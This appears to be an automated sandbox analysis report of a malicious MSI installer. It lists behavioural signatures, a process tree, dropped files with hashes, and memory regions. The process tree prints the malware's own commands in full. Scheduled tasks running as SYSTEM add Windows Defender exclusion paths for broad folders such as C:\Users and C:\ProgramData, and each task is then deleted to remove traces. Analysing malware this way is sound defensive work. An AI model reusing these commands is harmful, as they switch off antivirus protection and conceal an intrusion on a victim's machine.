Analysis

  • max time kernel
    150s
  • max time network
    149s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20260513-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20260513-enlocale:en-usos:windows10-2004-x64systemwindows
  • submitted
    30/07/2026, 03:10

General

  • Target
    Install_28n004.msi
  • Size 7.7MB
  • Sample260730-dn4ylaah97
  • SHA256 2509a2e1e0208bcf5a7192bf5abaefaf7a43186ff9b453d724b6a0a4b9cc35ea
  • MD5 SHA1 SHA512 SSDEEP TLSH

Malware Config

Signatures

  • Windows security bypass 2 TTPs 10 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 2 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Badlisted process makes network request 4 IoCs

    Network request originating from process or tool commonly abused by malware.

  • Enumerates connected drives 3 TTPs 46 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Indicator Removal: Clear Persistence 1 TTPs 5 IoCs

    Clear artifacts associated with previously established persistence like scheduletasks on a host.

  • Drops file in System32 directory 7 IoCs
  • Drops file in Windows directory 9 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Installer Packages 2 TTPs 1 IoCs
  • Executes a command shell one-liner 1 TTPs 5 IoCs

    Execution of a cmd.exe one-liner (/c "close" or /k "keep") is a common script/loader stage.

  • Checks SCSI registry key(s) 3 TTPs 5 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Modifies data under HKEY_USERS 9 IoCs
  • Modifies registry class 22 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 5 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of WriteProcessMemory 27 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Windows\system32\msiexec.exe
    msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\Install_28n004.msi
    1⤵
    • Enumerates connected drives
    • Event Triggered Execution: Installer Packages
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    PID:3820
  • C:\Windows\system32\msiexec.exe
    C:\Windows\system32\msiexec.exe /V
    1⤵
    • Enumerates connected drives
    • Drops file in Windows directory
    • Modifies data under HKEY_USERS
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:4708
    • C:\Windows\system32\srtasks.exe
      C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:4808
    • C:\Windows\System32\MsiExec.exe
      C:\Windows\System32\MsiExec.exe -Embedding F1F57769E4E8520BA14228E05E74FD26 E Global\MSI0000
      2⤵
      • Loads dropped DLL
      • Badlisted process makes network request
      • Drops file in System32 directory
      • Modifies data under HKEY_USERS
      • Suspicious behavior: EnumeratesProcesses
      PID:4520
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Checks SCSI registry key(s)
    • Suspicious use of AdjustPrivilegeToken
    PID:4192
  • C:\Users\Public\V7rK6W\wx9KZl.exe
    C:\Users\Public\V7rK6W\wx9KZl.exe
    1⤵
    • Checks computer location settings
    • Executes dropped EXE
    • Loads dropped DLL
    • Adds Run key to start application
    • Drops file in System32 directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:4220
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\Public\V7rK6W\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
      2⤵
      • Indicator Removal: Clear Persistence
      • Suspicious use of WriteProcessMemory
      PID:4336
      • C:\Windows\system32\schtasks.exe
        SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\Public\V7rK6W\" /t REG_DWORD /d 0 /f"
        3⤵
        • Scheduled Task/Job: Scheduled Task
        PID:4536
      • C:\Windows\system32\schtasks.exe
        SCHTASKS /Run /TN "Task1"
        3⤵
          PID:4300
        • C:\Windows\system32\schtasks.exe
          SCHTASKS /Delete /TN "Task1" /F
          3⤵
            PID:2952
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
          2⤵
          • Indicator Removal: Clear Persistence
          • Suspicious use of WriteProcessMemory
          PID:4944
          • C:\Windows\system32\schtasks.exe
            SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f"
            3⤵
            • Scheduled Task/Job: Scheduled Task
            PID:2664
          • C:\Windows\system32\schtasks.exe
            SCHTASKS /Run /TN "Task1"
            3⤵
              PID:3084
            • C:\Windows\system32\schtasks.exe
              SCHTASKS /Delete /TN "Task1" /F
              3⤵
                PID:3256
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
              2⤵
              • Indicator Removal: Clear Persistence
              • Suspicious use of WriteProcessMemory
              PID:972
              • C:\Windows\system32\schtasks.exe
                SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f"
                3⤵
                • Scheduled Task/Job: Scheduled Task
                PID:3444
              • C:\Windows\system32\schtasks.exe
                SCHTASKS /Run /TN "Task1"
                3⤵
                  PID:5104
                • C:\Windows\system32\schtasks.exe
                  SCHTASKS /Delete /TN "Task1" /F
                  3⤵
                    PID:2688
                • C:\Windows\System32\cmd.exe
                  "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                  2⤵
                  • Indicator Removal: Clear Persistence
                  • Suspicious use of WriteProcessMemory
                  PID:4520
                  • C:\Windows\system32\schtasks.exe
                    SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f"
                    3⤵
                    • Scheduled Task/Job: Scheduled Task
                    PID:960
                  • C:\Windows\system32\schtasks.exe
                    SCHTASKS /Run /TN "Task1"
                    3⤵
                      PID:2372
                    • C:\Windows\system32\schtasks.exe
                      SCHTASKS /Delete /TN "Task1" /F
                      3⤵
                        PID:1004
                    • C:\Windows\System32\cmd.exe
                      "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"%USERPROFILE%\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                      2⤵
                      • Indicator Removal: Clear Persistence
                      • Suspicious use of WriteProcessMemory
                      PID:1568
                      • C:\Windows\system32\schtasks.exe
                        SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\Admin\Documents\" /t REG_DWORD /d 0 /f"
                        3⤵
                        • Scheduled Task/Job: Scheduled Task
                        PID:2620
                      • C:\Windows\system32\schtasks.exe
                        SCHTASKS /Run /TN "Task1"
                        3⤵
                          PID:5064
                        • C:\Windows\system32\schtasks.exe
                          SCHTASKS /Delete /TN "Task1" /F
                          3⤵
                            PID:1544
                      • C:\Windows\system32\cmd.exe
                        cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Public\V7rK6W" /t REG_DWORD /d 0 /f
                        1⤵
                        • Executes a command shell one-liner
                        • Suspicious use of WriteProcessMemory
                        PID:1196
                        • C:\Windows\system32\reg.exe
                          reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Public\V7rK6W" /t REG_DWORD /d 0 /f
                          2⤵
                          • Windows security bypass
                          PID:4748
                      • C:\Windows\system32\cmd.exe
                        cmd.exe
                        1⤵
                          PID:4168
                        • C:\Windows\system32\cmd.exe
                          cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
                          1⤵
                          • Executes a command shell one-liner
                          • Suspicious use of WriteProcessMemory
                          PID:464
                          • C:\Windows\system32\reg.exe
                            reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
                            2⤵
                            • Windows security bypass
                            PID:2416
                        • C:\Windows\system32\cmd.exe
                          cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f
                          1⤵
                          • Executes a command shell one-liner
                          • Suspicious use of WriteProcessMemory
                          PID:1016
                          • C:\Windows\system32\reg.exe
                            reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f
                            2⤵
                            • Windows security bypass
                            PID:2316
                        • C:\Windows\system32\cmd.exe
                          cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f
                          1⤵
                          • Executes a command shell one-liner
                          • Suspicious use of WriteProcessMemory
                          PID:1900
                          • C:\Windows\system32\reg.exe
                            reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f
                            2⤵
                            • Windows security bypass
                            PID:552
                        • C:\Windows\system32\cmd.exe
                          cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Admin\Documents" /t REG_DWORD /d 0 /f
                          1⤵
                          • Executes a command shell one-liner
                          • Suspicious use of WriteProcessMemory
                          PID:2128
                          • C:\Windows\system32\reg.exe
                            reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Admin\Documents" /t REG_DWORD /d 0 /f
                            2⤵
                            • Windows security bypass
                            PID:2932

                        Network

                              MITRE ATT&CK Enterprise v16

                              Replay Monitor

                              Loading Replay Monitor...

                              Downloads

                              e5842c2.rbs

                              • Path C:\Config.Msi\e5842c2.rbs
                              • Size 7KB
                              • SHA256 4d3ec5338b97f4d0df79e7454bfb33653839f6ca54e95b77319bc0fcccff06bc
                              • MD5 SHA1 SHA512 SSDEEP TLSH

                              UxEnhance64.dll

                              • Path C:\Users\Public\V7rK6W\UxEnhance64.dll
                              • Size 3.1MB
                              • SHA256 6da29600ee7f404230bdb7c6d784bbf43eba93df47a89e2c921f610a7e58b362
                              • MD5 SHA1 SHA512 SSDEEP TLSH

                              adoresd.dat

                              • Path C:\Users\Public\V7rK6W\adoresd.dat
                              • Size 4.8MB
                              • SHA256 da364f7b6751ecba5f6c50a8e5467b22bcd997697c97fc030e2f36868ad0a4a5
                              • MD5 SHA1 SHA512 SSDEEP TLSH

                              msadox.tb

                              • Path C:\Users\Public\V7rK6W\msadox.tb
                              • Size 8KB
                              • SHA256 6127ad967b9401163f0e1b0c3de05aa8ec28cabeceae90374c752afc80c056cc
                              • MD5 SHA1 SHA512 SSDEEP TLSH

                              wx9KZl.exe

                              • Path C:\Users\Public\V7rK6W\wx9KZl.exe
                              • Size 135KB
                              • SHA256 676a2a7b94ca2f8ec76352ee656e4d075bb342bd7ad6efbc7c19c060001eace7
                              • MD5 SHA1 SHA512 SSDEEP TLSH

                              MSI4439.tmp

                              • Path C:\Windows\Installer\MSI4439.tmp
                              • Size 7.6MB
                              • SHA256 b3c2c9b7ae11357da53cb6ba325949b2e73cd89aaaf2336257ba9f5709900f5e
                              • MD5 SHA1 SHA512 SSDEEP TLSH

                              e5842c1.msi

                              • Path C:\Windows\Installer\e5842c1.msi
                              • Size 7.7MB
                              • SHA256 2509a2e1e0208bcf5a7192bf5abaefaf7a43186ff9b453d724b6a0a4b9cc35ea
                              • MD5 SHA1 SHA512 SSDEEP TLSH

                              metadata-2

                              • Path \??\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\System Volume Information\SPP\metadata-2
                              • Size 24.1MB
                              • SHA256 a9fd8d0dad03f8d1bd59882da1d8b844abe4288fe76047fe9203318ff6e9e823
                              • MD5 SHA1 SHA512 SSDEEP TLSH

                              {85770ed8-e7d5-44dc-92e8-de399e9a877c}_OnDiskSnapshotProp

                              • Path \??\Volume{4588d6e0-0000-0000-0000-d01200000000}\System Volume Information\SPP\OnlineMetadataCache\{85770ed8-e7d5-44dc-92e8-de399e9a877c}_OnDiskSnapshotProp
                              • Size 6KB
                              • SHA256 a32fc17317dd0dfb567c2be8ac0ceca6e691a049ded24d130b46bf8e70285051
                              • MD5 SHA1 SHA512 SSDEEP TLSH

                              memory/4220-76-0x000002AC7EBC0000-0x000002AC7F47E000-memory.dmp

                              memory/4220-72-0x000002AC7EBC0000-0x000002AC7F47E000-memory.dmp

                              memory/4220-56-0x00007FFC48450000-0x00007FFC48452000-memory.dmp

                              memory/4220-58-0x00007FFC28C20000-0x00007FFC2913E000-memory.dmp

                              memory/4220-81-0x000002AC7C980000-0x000002AC7C9CE000-memory.dmp

                              memory/4220-91-0x000002AC7EBC0000-0x000002AC7F47E000-memory.dmp

                              memory/4220-62-0x000002AC7EBC0000-0x000002AC7F47E000-memory.dmp

                              memory/4220-65-0x000002AC7EBC0000-0x000002AC7F47E000-memory.dmp

                              memory/4220-64-0x00007FFC48460000-0x00007FFC48462000-memory.dmp

                              memory/4220-70-0x000002AC7EBC0000-0x000002AC7F47E000-memory.dmp

                              memory/4220-71-0x000002AC7EBC0000-0x000002AC7F47E000-memory.dmp

                              memory/4220-82-0x000002AC7F850000-0x000002AC7F8DA000-memory.dmp

                              memory/4220-69-0x000002AC7EBC0000-0x000002AC7F47E000-memory.dmp

                              memory/4220-90-0x000002AC7EBC0000-0x000002AC7F47E000-memory.dmp

                              memory/4220-85-0x000002AC7F850000-0x000002AC7F8DA000-memory.dmp

                              memory/4220-84-0x000002AC7F850000-0x000002AC7F8DA000-memory.dmp

                              memory/4220-83-0x000002AC7F850000-0x000002AC7F8DA000-memory.dmp

                              memory/4520-42-0x00007FFC38680000-0x00007FFC38690000-memory.dmp

                              memory/4520-13-0x00007FFC2A220000-0x00007FFC2A86E000-memory.dmp

                              memory/4520-16-0x00007FFC38680000-0x00007FFC38690000-memory.dmp

                              memory/4520-12-0x00007FFC48450000-0x00007FFC48452000-memory.dmp